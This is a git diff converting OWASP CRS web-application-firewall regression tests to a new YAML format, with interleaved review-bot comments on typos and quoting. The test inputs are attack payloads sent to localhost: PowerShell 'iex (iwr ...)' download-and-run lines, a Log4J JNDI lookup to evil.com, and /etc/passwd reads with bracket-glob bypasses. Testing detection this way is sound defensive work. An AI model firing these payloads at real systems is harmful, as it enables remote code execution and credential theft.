- uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd"
- version: HTTP/1.1
- output:
- log_contains: id "931131"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: localhost
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [931131]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
index f48d4fe29..9050adb99 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
@@ -1,87 +1,85 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "932120.yaml" - description: "Tests to trigger or not trigger rule 932120" +rule_id: 932120 tests: - - test_title: 932120-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test 
agent" - Host: "localhost" - Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932120\"" - - test_title: 932120-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932120] + - test_id: 5 desc: "Test for BB GU2FIXLC - powershell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' - version: "HTTP/1.1" - output: - log_contains: id "932120" + - input: + 
dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index a5df88d85..a4fb0ce80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml 
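Review bot: The cookie name in test 3, `Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1"`, refers to rule 931120 while every other stage in this file names its parameter after the rule under test (`932120-1`, `932120-2`, `932120-4`); the mismatch is carried over unchanged and reads as a typo, so it should become `Cookie: "932120-3=Invoke-Expression%20-Command%20file.ps1"`. Tests 1–4 also carry no `desc` while test 5 does; with `test_title` removed, `desc` is the only human-readable label left in the file, so one line each such as `desc: "Invoke-WebRequest in query string"`, `desc: "Invoke-WebRequest in POST body"`, `desc: "Invoke-Expression in cookie"` and `desc: "Negative: cmdlet name split by spaces"` would let a failing test_id be understood without opening the file.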
@@ -1,55 +1,53 @@
 ---
 meta:
 author: "0xInfection"
- enabled: true
- name: "932125.yaml"
- description: "Tests to trigger rule 932125"
+rule_id: 932125
 tests:
- - test_title: 932125-1
+ - test_id: 1
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "GET"
- port: 80
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: "localhost"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1"
- version: "HTTP/1.1"
- output:
- log_contains: id "932125"
- - test_title: 932125-2
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [932125]
+ - test_id: 2
 desc: "Test for BB finding VYYFBP5V"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "GET"
- port: 80
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: "localhost"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd"
- version: "HTTP/1.1"
- output:
- log_contains: id "932125"
- - test_title: 932125-3
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [932125]
+ - test_id: 3
 desc: "Test for BB finding VYYFBP5V"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "POST"
- port: 80
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: "localhost"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- uri: "/post"
- data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1)
- version: "HTTP/1.1"
- output:
- log_contains: id "932125"
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "POST"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ uri: "/post"
+ data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1)
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [932125]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
index b5c8aa173..ba37e6c0c 100755
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
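Review bot: The POST body in test 3, `data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1)`, is an unquoted plain scalar; it happens to parse as a string today, but any later tweak that introduces `: ` or ` #` into the payload silently turns it into a nested mapping or a comment, and every other request value in these stages (`uri`, `dest_addr`, `method`, `version`) is quoted. Single-quote it as `data: 'cmd=;iex (iwr http://10.0.10.10:8000/x.ps1)'` so the payload is taken literally with no escape processing. Tests 2 and 3 also share the identical `desc: "Test for BB finding VYYFBP5V"` while exercising different payloads (`iwmi` in the query string vs. `iex (iwr …)` in the body) and test 1 has no desc at all; naming the cmdlet and the location in each desc (e.g. `desc: "Test for BB finding VYYFBP5V - iex/iwr in POST body"`) would make a failure report point at the right case now that `test_title` is gone.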
@@ -1,268 +1,266 @@ --- meta: author: "Paul Beckett, Max Leske, azurit" - enabled: true - name: "932130.yaml" - description: "Tests to trigger or not trigger rule 932130" +rule_id: 932130 tests: - - test_title: 932130-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932130-1=$(cmd)" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932130-1=$(cmd)" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-2=${cmd}" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-2=${cmd}" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "931120-3=<(cmd)" - uri: 
"/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "931120-3=<(cmd)" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: ">(cmd)=931120-4" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: ">(cmd)=931120-4" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-5=Some text (in brackets)." - version: "HTTP/1.1" - output: - no_log_contains: 'id "932130"' - - test_title: 932130-6 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-5=Some text (in brackets)." 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [932130] + - test_id: 6 desc: "Log4J exploit picked up by shell exploit detection in body" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 7 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 8 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /etc/pa[s]swd - uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /etc/pa[s]swd + uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 9 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /[?]tc/pa[?]swd - uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /[?]tc/pa[?]swd + uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 10 desc: "Unix command injection - character set bypass - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # hello [text in brackets] - uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" - version: 
HTTP/1.0 - output: - no_log_contains: id "932130" - - test_title: 932130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # hello [text in brackets] + uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932130] + - test_id: 11 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/pas[s]wd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/pas[s]wd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 12 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bp%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bp%5Dasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 13 desc: 
"Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5B!q%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5B!q%5Dasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 14 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bm-z%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bm-z%5Dasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 15 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-16 + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 16 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?exec=/bi%5Bn%5D/bash" - version: HTTP/1.0 - output: - log_contains: id "932130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?exec=/bi%5Bn%5D/bash" + version: HTTP/1.0 + output: + log: + expect_ids: [932130]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml
index 378089c7c..3f673ed4a 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml
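Review bot: In tests 3 and 4 the cookie markers `Cookie: "931120-3=<(cmd)"` and `Cookie: ">(cmd)=931120-4"` name rule 931120 although this file tests 932130 and every other test in it labels its parameter `932130-N`; the value still hits the rule, but the marker reads like a copy-paste leftover and misleads anyone grepping the audit log by test id, so change them to `Cookie: "932130-3=<(cmd)"` and `Cookie: ">(cmd)=932130-4"`. From test 7 onward `dest_addr: 127.0.0.1`, `Host: localhost` and `version: HTTP/1.0` are left unquoted while tests 1–6 quote the same values; the conversion touched every line, so this was the moment to settle on one quoting style for the file. The hunk covers the whole file.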
@@ -1,39 +1,37 @@ --- meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "932131.yaml" - description: "Tests to trigger or not trigger rule 932131" +rule_id: 932131 tests: - - test_title: 932131-1 + - test_id: 1 desc: Log4J test with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}" - Host: "localhost" - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932131" - - test_title: 932131-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}" + Host: "localhost" + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932131] + - test_id: 2 desc: False positive against Facebook for Android user agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]" - Host: "localhost" - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932131" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]" + Host: "localhost" + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932131]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
index a105ef47d..e38f63c71 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
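Review bot: The User-Agent in test 2 ends with `fbav/403.0.0.27.81 ]`, a space before the closing bracket, and nothing in the file says whether that space is deliberate; if it is part of the real-world agent that produced the false positive, a formatter or a hand edit could strip it and silently turn the negative test into a different input, so document it with `# the space before ']' is part of the original UA that caused the FP — keep it` above the header line. The `desc` values here are plain scalars while the two preceding files in this commit quote theirs, e.g. `desc: "False positive against Facebook for Android user agent"`. The hunk covers the whole file.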
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml 
@@ -2,2540 +2,2539 @@ meta: author: "fgsch, azurit" description: Tests for Windows for command - enabled: true - name: 932140.yaml +rule_id: 932140 tests: - - test_title: 932140-1 + - test_id: 1 desc: for % stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 2 desc: for %% stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 3 desc: for /d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: 
